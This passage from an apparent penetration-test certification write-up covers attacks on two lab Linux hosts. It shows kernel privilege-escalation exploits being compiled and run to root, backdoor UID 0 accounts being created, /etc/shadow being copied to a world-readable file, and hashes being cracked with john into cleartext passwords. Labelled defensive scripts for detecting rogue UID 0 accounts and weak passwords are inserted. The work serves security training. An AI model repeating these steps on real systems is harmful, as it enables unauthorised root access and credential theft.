....;http://www.anyside.org/exp/exploits/local/xlock-XLOCALEDIR.c;Local root
exploit utilizing the overflow in XLOCALEDIR under XFree86 Version 4.2.x using
xlock. Written to work on Redhat 7.2.

The search returned 13 possible exploits. The Rocks Clusters <= 4.1
(mount-loop) Local Root Exploit, Rocks Clusters <= 4.1 (umount-loop)
Local Root Exploit, Apple Mac OS X (/usr/bin/passwd) Custom Passwd
Local Root Exploit, FreeBSD (4.x , < 5.4) master.passwd Disclosure
Exploit, SuSE Linux <= 9.3, 10 (chfn) Local Root Privilege Escalation
Exploit, Sudo 1.3.1 - 1.6.8p Pathname Validation Local Root Exploit
(openbsd), OpenBSD sudo 1.3.1 - 1.6.8p local root exploit and "The same
vulnerability to x_hp-ux11i_nls_ct.c, but exploit ping command to get
root shell" exploits can be ruled out as they are written for operating
systems other than the one in use. The SquirrelMail 3.1 Change Passwd
Plugin Local Buffer Overflow Exploit and cdrecord $RSH exec() SUID
Shell Creation exploits can also be ruled out as they target
applications that don't exist on the host.
This leaves 3 possible exploits: Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV
variables) Local Root Exploit, "sudo exploit." and "Local root exploit
utilizing the overflow in XLOCALEDIR under XFree86 Version 4.2.x using
xlock. Written to work on Redhat 7.2."
The version of XFree86 on the host was found to be 4.3.0, which
eliminates the XFree86 exploit from the list of candidates.
[cptvm1@cptvm1 commands]$ X -version
XFree86 Version 4.3.0 (Red Hat Linux release: 4.3.0-2)
Release Date: 27 February 2003
X Protocol Version 11, Revision 0, Release 6.6
Build Operating System: Linux 2.4.20-3bigmem i686 [ELF]
Build Date: 27 February 2003
Build Host: porky.devel.redhat.com

Before reporting problems, check http://www.XFree86.Org/
to make sure that you have the latest version.
Module Loader present
OS Kernel: Linux version 2.4.20-8 (bhcompile@porky.devel.redhat.com) (gcc
version 3.2.2 20030222 (Red Hat Linux 3.2.2-5)) #1 Thu Mar 13 17:54:28 EST
2003

The version of sudo was found to be 1.6.6.
[cptvm1@cptvm1 commands]$ sudo -V
Sudo version 1.6.6

The version of sudo fits within the requirements for the Sudo <=
1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit. So, it
was downloaded and the code reviewed. Unfortunately, this exploit
relies on an entry within the /etc/sudoers file that points to a file the
user has full access to modify. This situation does not exist on the
cptvm1 host.
The "sudo exploit." entry doesn't provide enough information about its
requirements to rule it out. Attempting to download the exploit
resulted in a 404 error from the anyside.org web site. Without a more
detailed description, further research into this exploit was suspended.
ii. Local exploit research via secwatch.org
Searches for exploits of at, chage, chfn, chsh, crontab, lppasswd,
mount, newgrp, pam_timestamp_check, passwd, ping, ping6, rcp,
rlogin, rnews, rsh, sudo, suexec, traceroute, umount, unix_chkpwd,
userhelper and XFree86 returned quite a number of results. Most of
the exploits were eliminated due to mismatches on the operating
system or version. The remaining exploits, 24 exploits in total, were
downloaded, reviewed, compiled and tested. It should be noted that
the gcc compiler on the cptvm1 host was named gcc296. To make
things easier, a bin directory was created within the cptvm1 user's
home directory, a symbolic link named gcc was created for gcc296 and
the bin directory was added to the PATH. No successful exploits for
the executables listed above were found.
A search for inndstart provided an interesting exploit. Instead of a
typical buffer overflow, this exploit relies on a poorly planned
application feature. An environment variable named INNCONF can be
defined to point to the location of the inn.conf configuration file.
This enables a local user with access to the inndstart program to
create their own inn.conf file with a "pathrun" entry pointing to a
directory owned by root and defining a program of their choosing to be
executed as root.
While this exploit sounded promising, the ability to change the
ownership of a directory or file to root is limited on the cptvm1 host,
which ultimately ruled this exploit out.
iii. Privilege escalation using a Kernel VMA exploit
Overall, the secwatch.org site provides a search mechanism that is
superior to anyside.org. The secwatch.org search aggregates exploit
search results from several other sites into a single result page.
Unfortunately, the search mechanism only appears to work optimally
with single words. In several cases, a search using multiple words
received no results back from secwatch.org. However, when the same
search string was entered directly on a site, multiple exploits were
found.
With the issues found with the search mechanism of secwatch.org, a
switch to milw0rm.com as the primary search site was made. The
quality of the exploit code on milw0rm.com appears to be quite a bit
better than the code on the other sites that were searched.
A search on milw0rm.com for "linux kernel 2.4" resulted in the
following exploits.

Illustration 1: Milw0rm search results for "linux kernel 2.4".


Immediately, the Linux Kernel 2.4.x-2.6.x Assembler Inline Function
Local DoS Exploit can be removed from the list as it isn't a root
exploit. The Linux Kernel 2.4.22 "do_brk()" local Root Exploit (PoC)
can also be removed as the kernel version in use is 2.4.20.
This left 5 exploits: Linux Kernel 2.4/2.6 x86-64 System Call
Emulation Exploit, Linux Kernel 2.4/2.6 bluez Local Root Privilege
Escalation Exploit (update), Linux Kernel 2.4.x / 2.6.x uselib() Local
Privilege Escalation Exploit, Linux Kernel 2.4 uselib() Privilege
Elevation Exploit and Linux Kernel 2.4.x mremap() bound checking
Root Exploit. The exploits were taken in order, compiled and
executed.
The Tim Hsu, 2005-01-27, Linux Kernel 2.4 uselib() Privilege
Elevation Exploit resulted in a shell with root access.
[cptvm1@cptvm1 kernel-uselib]$ gcc -o uselib uselib.c
[cptvm1@cptvm1 kernel-uselib]$ ll
total 56
drwxr-xr-x   2 cptvm1 cptvm1  4096 Jan 28 02:10 ./
drwxr-xr-x  42 cptvm1 cptvm1  4096 Feb 14  2009 ../
-rwxrwxr-x   1 cptvm1 cptvm1 27027 Jan 28 02:10 uselib*
-rw-r--r--   1 cptvm1 cptvm1 18774 Feb 14  2009 uselib.c
[cptvm1@cptvm1 kernel-uselib]$ ./uselib
[+] SLAB cleanup
child 1 VMAs 32
[+] moved stack bfffd000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xcfc00000 - 0xdf548000
Wait... [+] race won maps=58028
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xd096c000
[+] gate modified ( 0xffec9523 0x0804ec00 )
[+] exploited, uid=0
sh-2.05b# id
uid=0(root) gid=0(root) groups=501(cptvm1)
sh-2.05b#

iv. Maintaining access via creation of a new r00t account
After the successful use of the Kernel VMA exploit, consistent root
access to the cptvm1 host was required.
A new user account having the same user id and group id as the real
root account was created with the standard Linux useradd utility. After
the creation of the account, the password was set to expl0ited. While
setting the password to a variant of a dictionary word seemed like a
good idea, this caused the shadow password cracking phase to take
quite a bit longer.
sh-2.05b# env
TERM=vt100
PWD=/home/cptvm1/cpt/exploits/kernel-uselib
SHLVL=1
HISTFILE=/dev/null
_=/bin/env
sh-2.05b# export PATH=/usr/bin:/usr/sbin:/bin:/sbin
sh-2.05b# useradd -u 0 -o -g 0 -d /root r00t
sh-2.05b# passwd r00t
Changing password for user r00t.
New password:
BAD PASSWORD: it is based on a dictionary word
Retype new password:
passwd: all authentication tokens updated successfully.
sh-2.05b#

v. Gathering the shadow password file
With the successful creation of a method to gain root access in the
future, the gathering of the shadow password file could be
accomplished. In this case, the shadow password file was copied
within the shell created by the Kernel VMA exploit. However, it could
have also been gathered via the new r00t account. While not
required, the groups shadow file was also copied.
sh-2.05b# cp /etc/shadow /tmp
sh-2.05b# cp /etc/gshadow /tmp
sh-2.05b# chmod a+rw /tmp/shadow
sh-2.05b# chmod a+rw /tmp/gshadow
sh-2.05b# cd /tmp
sh-2.05b# ls -alF gshadow shadow
-rw-rw-rw-   1 root root  512 Feb 15 02:15 gshadow
-rw-rw-rw-   1 root root 1206 Feb 15 02:15 shadow
sh-2.05b#

H. Cracking passwords of the cptvm1 host
i. Cracking of user, cptvm1 and cptvm2
With full access to the shadow password file, the process of cracking
the passwords contained within was started.
In this case, the john utility was used. Within a few minutes the
passwords for the user, cptvm1 and cptvm2 user accounts were
cracked (not really required as they had already been brute forced).
However, the root and r00t accounts took quite a bit longer to crack.
While the john session named cptvm1 was left to run, research on
exploits for the cptvm2 host was started.
bt cptvm1 # john --session=cptvm1 shadow
Loaded 5 password hash (FreeBSD MD5 [32/32])
digital          (user)
windows          (cptvm1)
linux            (cptvm2)
guesses: 3 time: 0:05:24:14 (3) c/s: 5722 trying: tubt
Session aborted
bt cptvm1 # john -show shadow
user:digital:14019:0:99999:7:::
cptvm1:windows:14019:0:99999:7:::
cptvm2:linux:14019:0:99999:7:::
3 password hashes cracked, 2 left

bt cptvm1 # john --session=cptvm1 --users=root shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])

I. Penetration of cptvm2
i. Privilege escalation using a Kernel vmsplice exploit
Since the cptvm1 host fell to a kernel exploit, time was not spent
researching third party application and system utility exploits on the
cptvm2 host. A search on milw0rm.com for "linux kernel 2.6" resulted
in the following exploits.

Illustration 2: Milw0rm search results for "linux kernel 2.6".

Immediately, the Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1
Local DoS Exploit, Linux Kernel 2.6.x sys_timer_create() Local Denial
of Service Exploit and Linux Kernel 2.6.x Firewall Logging Rules
Remote DoS Exploit can be removed from the list as they aren't root
exploits. In addition, the Linux Kernel 2.6.13 <= 2.6.17.4
sys_prctl() Local Root Exploit, Linux Kernel 2.6.13 <= 2.6.17.4
sys_prctl() Local Root Exploit (2), Linux Kernel 2.6.13 <= 2.6.17.4
sys_prctl() Local Root Exploit (3), Linux Kernel 2.6.13 <= 2.6.17.4
sys_prctl() Local Root Exploit (4), Linux Kernel 2.6.13 <= 2.6.17.4
prctl() Local Root Exploit (logrotate) and Linux Kernel 2.6.23 - 2.6.24
vmsplice Local Root Exploit can also be removed from the list as they
aren't for the 2.6.18 version of the kernel.
This left 2 exploits: Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root
Exploit and Linux Kernel 2.6.x chown() Group Ownership Alteration
Exploit. The exploits were taken in order, compiled and executed.
The qaaz, 2008-02-09, Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local
Root Exploit resulted in a shell with root access.
[cptvm1@localhost kernel26_vmsplice]$ ll
total 16
-rw-r--r-- 1 cptvm1 cptvm1 6293 Feb 15 2009 jessica_biel_naked_in_my_bed.c
[cptvm1@localhost kernel26_vmsplice]$ gcc -o jessica_biel_naked_in_my_bed jessica_biel_naked_in_my_bed.c
[cptvm1@localhost kernel26_vmsplice]$ ll
total 28
-rwxrwxr-x 1 cptvm1 cptvm1 8522 Feb 7 04:05 jessica_biel_naked_in_my_bed
-rw-r--r-- 1 cptvm1 cptvm1 6293 Feb 15 2009 jessica_biel_naked_in_my_bed.c
[cptvm1@localhost kernel26_vmsplice]$ ./jessica_biel_naked_in_my_bed
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f36000 .. 0xb7f68000
[+] root
[root@localhost kernel26_vmsplice]# id
uid=0(root) gid=0(root) groups=500(cptvm1)
[root@localhost kernel26_vmsplice]#

ii. Maintaining access via creation of a new r00t account
After the successful use of the Kernel vmsplice exploit, consistent root
access to the cptvm2 host was required.
A new user account having the same user id and group id as the real
root account was created with the standard Linux useradd utility. After
the creation of the account, the password was set to windows. The
previous mistake of setting a tough password was not repeated.
[root@localhost kernel26_vmsplice]# env
SSH_AGENT_PID=3134
HOSTNAME=localhost.localdomain
TERM=xterm
SHELL=/bin/bash
DESKTOP_STARTUP_ID=
HISTSIZE=1000
GTK_RC_FILES=/etc/gtk/gtkrc:/home/cptvm1/.gtkrc-1.2-gnome2
WINDOWID=48234577
USER=cptvm1

LS_COLORS=no=00:fi=00:di=00;34:ln=00;36:pi=40;33:so=00;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=00;32:*.cmd=00;32:*.exe=00;32:*.com=00;32:*.btm=00;32:*.bat=00;32:*.sh=00;32:*.csh=00;32:*.tar=00;31:*.tgz=00;31:*.arj=00;31:*.taz=00;31:*.lzh=00;31:*.zip=00;31:*.z=00;31:*.Z=00;31:*.gz=00;31:*.bz2=00;31:*.bz=00;31:*.tz=00;31:*.rpm=00;31:*.cpio=00;31:*.jpg=00;35:*.gif=00;35:*.bmp=00;35:*.xbm=00;35:*.xpm=00;35:*.png=00;35:*.tif=00;35:
SSH_AUTH_SOCK=/tmp/ssh-aqCddQ3075/agent.3075
GNOME_KEYRING_SOCKET=/tmp/keyring-euEoqc/socket
USERNAME=cptvm1
SESSION_MANAGER=local/localhost.localdomain:/tmp/.ICE-unix/3075
PATH=/usr/kerberos/sbin:/usr/bin:/usr/sbin:/bin:/sbin:/usr/kerberos/bin:/usr/local/bin:/usr/bin:/bin:/usr/X11R6/bin:/home/cptvm1/bin
DESKTOP_SESSION=default
MAIL=/var/spool/mail/cptvm1
GDM_XSERVER_LOCATION=local
PWD=/home/cptvm1/cpt/exploits/kernel26_vmsplice
INPUTRC=/etc/inputrc
XMODIFIERS=@im=none
LANG=en_US.UTF-8
GDMSESSION=default
SSH_ASKPASS=/usr/libexec/openssh/gnome-ssh-askpass
SHLVL=3
HOME=/home/cptvm1
GNOME_DESKTOP_SESSION_ID=Default
LOGNAME=cptvm1
CVS_RSH=ssh
DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbusyuVqOWjtSW,guid=f9418d49bbcbb5875e2b080cbf709f00
LESSOPEN=|/usr/bin/lesspipe.sh %s
DISPLAY=:0.0
HISTFILE=/dev/null
G_BROKEN_FILENAMES=1
XAUTHORITY=/tmp/.gdmI40NOU
COLORTERM=gnome-terminal
_=/usr/bin/env
[root@localhost kernel26_vmsplice]# useradd -u 0 -o -g 0 -d /root r00t
useradd: warning: the home directory already exists.
Not copying any file from skel directory into it.
[root@localhost kernel26_vmsplice]# passwd r00t
Changing password for user r00t.
New UNIX password:
BAD PASSWORD: it is based on a dictionary word
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
[root@localhost kernel26_vmsplice]#
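The useradd -u 0 -o command used here and in section G.iv leaves a second UID 0 entry in /etc/passwd, and the shadow entry it creates carries a newer last-change day than the accounts from the original build (14272 against 14019 in the cptvm1 crack results). The script below is an added example and is not part of this report; it checks passwd-format and shadow-format input for exactly that pattern. The passwd and shadow content in demo() is constructed and its hash fields are placeholders, not real hashes.

```shell
#!/bin/sh
# Added example, not part of the report: find login accounts that share
# UID 0 with root (what "useradd -u 0 -o" creates) and report when each
# last had its password set. The passwd and shadow content in demo() is
# constructed and the hash fields are placeholders, not real hashes.

# Usernames from passwd-format input on stdin whose UID is 0 and whose
# name is not "root".
extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# uid0_report PASSWD SHADOW
# For every extra UID 0 account print its name and its shadow "last
# changed" day (days since 1970-01-01) next to root's own value. A value
# later than root's says the account was added after the system was
# built, which is the trace the r00t accounts above leave behind.
# Returns 1 when at least one extra UID 0 account exists.
uid0_report() {
    root_day=$(awk -F: '$1 == "root" { print $3 }' "$2")
    found=0
    for u in $(extra_uid0 < "$1"); do
        day=$(awk -F: -v u="$u" '$1 == u { print $3 }' "$2")
        echo "extra UID 0 account: $u lastchg=${day:-unknown} root_lastchg=${root_day:-unknown}"
        found=1
    done
    [ "$found" -eq 0 ]
}

# Constructed demonstration modelled on the cptvm1 results above.
demo() {
    dir=$(mktemp -d)
    cat > "$dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
cptvm1:x:500:500::/home/cptvm1:/bin/bash
r00t:x:0:0::/root:/bin/bash
EOF
    cat > "$dir/shadow" <<'EOF'
root:$1$PLACEHOLDER$0000000000000000000000:14019:0:99999:7:::
bin:*:14019:0:99999:7:::
cptvm1:$1$PLACEHOLDER$1111111111111111111111:14019:0:99999:7:::
r00t:$1$PLACEHOLDER$2222222222222222222222:14272:0:99999:7:::
EOF
    if uid0_report "$dir/passwd" "$dir/shadow"; then
        echo "no extra UID 0 accounts"
    fi
    rm -rf "$dir"
}

demo
```

On a live host the two arguments are /etc/passwd and /etc/shadow (the latter readable only as root), and a non-zero exit from uid0_report is the condition to alert on; the world-readable copies of shadow left in /tmp on both hosts are worth a separate check of file modes under /tmp.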

iii. Gathering the shadow password file
With the successful creation of a method to gain root access in the
future, the gathering of the shadow password file could be
accomplished. In this case, the shadow password file was copied
within the shell created by the Kernel vmsplice exploit. However, it
could have also been gathered via the new r00t account.
[root@localhost kernel26_vmsplice]# cp /etc/shadow /tmp
[root@localhost kernel26_vmsplice]# chmod a+rw /tmp/shadow
[root@localhost kernel26_vmsplice]# cd /tmp
[root@localhost tmp]# ls -alF shadow
-rw-rw-rw- 1 root root 1235 Feb 7 04:08 shadow
[root@localhost tmp]#

J. Cracking passwords of the cptvm2 host
i. Cracking of cptvm1, cptvm2, root and r00t
The cracking of the cptvm2 accounts was trivial in comparison to the
time the cptvm1 host had already taken (over 10 hours). Using only
the default dictionary within john, the entire process took just over 6
minutes to complete. This was due to the existence of the root
password within the standard john wordlist.
bt cptvm2 # john --session=cptvm2 shadow
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [32/32])
admin            (root)
windows          (cptvm1)
windows          (r00t)
linux            (cptvm2)
guesses: 4 time: 0:00:06:13 (3) c/s: 4533 trying: linux
bt cptvm2 # john -show shadow
root:admin:14019:0:99999:7:::
cptvm1:windows:14019:0:99999:7:::
cptvm2:linux:14019:0:99999:7:::
r00t:windows:14282:0:99999:7:::
4 password hashes cracked, 0 left
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
7/tcp
echo
21/tcp
ftp
vsftpd 1.1.3
22/tcp
ssh
OpenSSH 3.5p1 (protocol 1.99)
23/tcp
telnet
Linux telnetd
79/tcp
finger
Linux fingerd
80/tcp
http
Apache httpd 2.0.40 (Red Hat Linux)
109/tcp
POSSIBLY pop2
110/tcp
pop3
ipopd 2001.78rh
111/tcp
rpcbind
2 (rpc #100000)
143/tcp
imap
UW Imapd 2001.315rh
199/tcp
smux
Linux SNMP multiplexer
443/tcp
ssl/http
Apache httpd 2.0.40 (Red Hat Linux)
686/tcp
rquotad
1-2 (rpc #100011)
993/tcp
imaps
995/tcp
pop3s
6000/tcp
X11
32768/tcp
status
1 (rpc #100024)
32770/tcp
mountd
1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
7/udp
echo
13/udp
daytime
37/udp
time (32 bits)
111/udp
rpcbind
2 (rpc #100000)
123/udp
ntp

161/udp
snmp
SNMPv1 server (public)
162/udp
snmptrap
631/udp
unknown
683/udp
rquotad
1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm,
gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp,
operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd,
sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/sbin/suexec,
/sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart,
/usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd,
/sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh,
/usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper,
/bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage,
/usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute,
/usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: user/digital, cptvm1/windows, cptvm2/linux
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.18-8
TCP ports: 22, 111, 939
TCP services:
22/tcp
ssh
OpenSSH 4.3 (protocol 2.0)
111/tcp
rpcbind
2 (rpc #100000)
939/tcp
status
1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus,
distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named,
news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm,
shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/bin/sudoedit, /media/.hal-mtablock, /usr/sbin/suexec, /usr/bin/Xorg, /usr/bin/chfn, /usr/bin/chsh,
/usr/sbin/userhelper, /usr/lib/squid/ncsa_auth, /usr/lib/squid/pam_auth,
/bin/mount, /bin/ping, /bin/ping6, /bin/su, /bin/umount, /sbin/mount.nfs,
/sbin/mount.nfs4, /sbin/pam_timestamp_check, /sbin/umount.nfs,
/sbin/umount.nfs4, /sbin/unix_chkpwd, /usr/bin/at, /usr/bin/chage,
/usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/passwd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/kerberos/bin/ksu, /usr/libexec/openssh/ssh-keysign, /usr/sbin/ccreds_validate, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: cptvm1/windows, cptvm2/linux, r00t/windows, root/admin

K. Cracking passwords of the cptvm1 host round 2
i. Cracking of root and r00t
At this point, the john utility had been running for quite some time
without success. With such a difference in john run time between the
cptvm1 and cptvm2 hosts, research into the cause was begun.
Comparing the default wordlist used by john to the one that had been
used during the brute force hydra attack showed that the john wordlist
was far smaller. The original assumption had been that the default john
wordlist would be optimized for password cracking, so it had been used
as is.
As all of the passwords discovered so far were standard dictionary
words, it seemed logical that the remaining passwords would most
likely be dictionary words, too. With this in mind, a larger wordlist
would be required. To generate this wordlist, the aspell master English
dictionary was dumped, cleaned up and sorted. This resulted in a
dictionary of roughly 118,000 words.
bt passwords # aspell dump master | sed s/\'//g | sort -u > matt.txt
bt passwords # wc -l matt.txt
118051 matt.txt
bt passwords # mv matt.txt 118051wordDictionary.txt
bt passwords # ll 118051wordDictionary.txt
-rw-r--r-- 1 503 503 1097205 Feb 15 23:05 118051wordDictionary.txt

With this new approach in mind, additional john sessions were created
to use the googled password.txt file and the newly generated aspell
dumped file. The results were far more impressive than anticipated.
Within 2 seconds, the password for the root account had been cracked.
bt cptvm1 # john --session=cptvm1-3 --users=root -wordlist=../passwords/118051wordDictionary.txt shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
cavalry          (root)
guesses: 1 time: 0:00:00:02 100% c/s: 5511 trying: cavalry

At this point, the john session that had been started to use the
googled password.txt file as a wordlist was aborted.
bt cptvm1 # john --session=cptvm1-2 --users=root -wordlist=../passwords/passwords.txt shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
guesses: 0 time: 0:00:00:22 100% c/s: 5502 trying: !

In addition, the initial john session was also aborted. I want those 11
hours of my life back, certification crew! :)
bt cptvm1 # john --session=cptvm1 --users=root shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
guesses: 0 time: 0:10:53:47 (3) c/s: 5722 trying: 35885297
Session aborted

Since we already know that the password to the r00t account is
expl0ited, this last step wasn't really required. However, to be 100%
complete, a john session was started to crack the r00t account. I
cheated and placed the expl0ited password in the wordlist. As
expected, john was able to crack the password in near record time.
bt cptvm1 # rm cptvm1.rec
bt cptvm1 # john --session=cptvm1 --users=r00t -wordlist=../passwords/118051wordDictionary.txt shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
expl0ited        (r00t)
guesses: 1 time: 0:00:00:09 100% c/s: 4707 trying: expl0ited

Ultimately, all of the cptvm1 account passwords were cracked.
bt cptvm1 # john -show shadow
root:cavalry:14019:0:99999:7:::
user:digital:14019:0:99999:7:::
cptvm1:windows:14019:0:99999:7:::
cptvm2:linux:14019:0:99999:7:::
r00t:expl0ited:14272:0:99999:7:::
5 password hashes cracked, 0 left
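The cracking results above show why the "BAD PASSWORD: it is based on a dictionary word" warning from passwd was the right call: expl0ited survived roughly 11 hours of john only because the wordlist lacked it, and fell in 9 seconds once it was added. The script below is an added example and is not part of this report. It builds a wordlist with the same apostrophe-stripping sort -u pipeline the report applies to the aspell dump (plus case folding), then rejects candidate passwords that match a wordlist entry either directly or after undoing common digit-for-letter substitutions, which is the check a password policy should apply at the moment a password is set. WORDLIST is a constructed sample of a few words; a deployment would load the full 118,051-word file produced above.

```shell
#!/bin/sh
# Added example, not part of the report: build a wordlist with the same
# pipeline the report applies to the aspell dump (strip apostrophes,
# sort -u, plus case folding) and reject password candidates that match
# an entry directly or after undoing digit-for-letter substitutions.
# WORDLIST is a constructed sample; a deployment would load the full
# 118,051-word file produced above.

# Raw dictionary on stdin -> lowercase, de-duplicated wordlist on stdout.
build_wordlist() {
    sed "s/'//g" | tr '[:upper:]' '[:lower:]' | sort -u
}

# Lowercase a candidate and undo common substitutions so that "Expl0ited"
# compares as "exploited": 0->o, 1->i, 3->e, 4->a, 5->s, 7->t, @->a, $->s.
# A cracking rule set tries many such mappings; one is enough to show why
# a digit-swapped dictionary word is weak.
normalize_leet() {
    printf '%s' "$1" | tr '[:upper:]' '[:lower:]' | tr '013457@$' 'oieastas'
}

WORDLIST=$(printf '%s\n' Admin Cavalry Digital Exploited Linux Password \
    Windows "Cavalry's" | build_wordlist)

# is_weak_password CANDIDATE: exit 0 when the candidate, lowercased or
# normalized, is in WORDLIST; exit 1 otherwise.
is_weak_password() {
    lower=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
    norm=$(normalize_leet "$1")
    printf '%s\n' "$WORDLIST" | grep -qxF -e "$lower" -e "$norm"
}

# Constructed demonstration over the kinds of passwords seen in the report.
demo() {
    for p in cavalry expl0ited Adm1n 'xk9-Vq#2pL'; do
        if is_weak_password "$p"; then
            echo "$p: REJECT (dictionary word or a simple variant)"
        else
            echo "$p: acceptable by this check"
        fi
    done
}

demo
```

The check is deliberately the same transformation a cracking rule applies, so whatever the policy accepts is at least not something the first pass of a wordlist attack will recover; length and entropy rules still belong on top of it.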
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
7/tcp
echo
21/tcp
ftp
vsftpd 1.1.3
22/tcp
ssh
OpenSSH 3.5p1 (protocol 1.99)
23/tcp
telnet
Linux telnetd
79/tcp
finger
Linux fingerd
80/tcp
http
Apache httpd 2.0.40 (Red Hat Linux)
109/tcp
POSSIBLY pop2
110/tcp
pop3
ipopd 2001.78rh
111/tcp
rpcbind
2 (rpc #100000)
143/tcp
imap
UW Imapd 2001.315rh
199/tcp
smux
Linux SNMP multiplexer
443/tcp
ssl/http
Apache httpd 2.0.40 (Red Hat Linux)
686/tcp
rquotad
1-2 (rpc #100011)
993/tcp
imaps
995/tcp
pop3s
6000/tcp
X11
32768/tcp
status
1 (rpc #100024)
32770/tcp
mountd
1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
7/udp
echo
13/udp
daytime
37/udp
time (32 bits)
111/udp
rpcbind
2 (rpc #100000)
123/udp
ntp
161/udp
snmp
SNMPv1 server (public)
162/udp
snmptrap
631/udp
unknown
683/udp
rquotad
1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm,
gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp,
operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd,
sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/sbin/suexec,
/sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart,
/usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd,
/sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh,
/usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper,
/bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage,
/usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute,
/usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctl

Username/password: user/digital, cptvm1/windows, cptvm2/linux, r00t/expl0ited,
root/cavalry
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.18-8
TCP ports: 22, 111, 939
TCP services:
22/tcp
ssh
OpenSSH 4.3 (protocol 2.0)
111/tcp
rpcbind
2 (rpc #100000)
939/tcp
status
1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus,
distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named,
news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm,
shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/bin/sudoedit, /media/.hal-mtablock, /usr/sbin/suexec, /usr/bin/Xorg, /usr/bin/chfn, /usr/bin/chsh,
/usr/sbin/userhelper, /usr/lib/squid/ncsa_auth, /usr/lib/squid/pam_auth,
/bin/mount, /bin/ping, /bin/ping6, /bin/su, /bin/umount, /sbin/mount.nfs,
/sbin/mount.nfs4, /sbin/pam_timestamp_check, /sbin/umount.nfs,
/sbin/umount.nfs4, /sbin/unix_chkpwd, /usr/bin/at, /usr/bin/chage,
